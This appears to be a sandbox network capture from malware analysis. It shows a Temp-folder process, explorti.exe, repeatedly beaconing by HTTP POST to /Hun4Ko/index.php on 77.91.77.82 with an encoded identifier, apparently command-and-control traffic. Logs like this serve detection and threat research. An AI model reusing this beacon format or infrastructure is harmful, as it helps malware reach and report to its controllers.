Jul 3, 2024 18:09:17.676943064 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:17.678174973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:17.679965973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:17.898384094 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	62934	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:18.017935038 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:18.694540977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:18.695369959 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:18.908742905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	62936	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:19.017062902 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:19.698211908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:19.699687958 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:19.915069103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	62937	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:20.032701969 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:20.720972061 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:20.736937046 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:21.238765001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 3, 2024 18:09:21.239487886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	62938	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:21.363918066 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:22.062084913 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:22.065663099 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:22.282608032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	62939	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:22.393872976 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:23.089390993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:23.090032101 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:23.312191963 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	62940	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:23.425834894 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:24.470679998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:24.471427917 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:24.473252058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:25.045638084 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 3, 2024 18:09:25.046993017 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	62941	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:25.159951925 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:25.840718985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:25.841485977 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:26.054505110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	62942	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:26.173286915 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:26.878729105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:26.898456097 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:27.121310949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	62943	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:27.602220058 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:28.290934086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:28.292192936 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:28.507081032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	62945	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:28.626436949 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:29.316668034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:29.317624092 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:29.533479929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	62946	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:29.641940117 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:30.327357054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:30.328197002 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:30.543145895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	62947	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:30.659423113 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
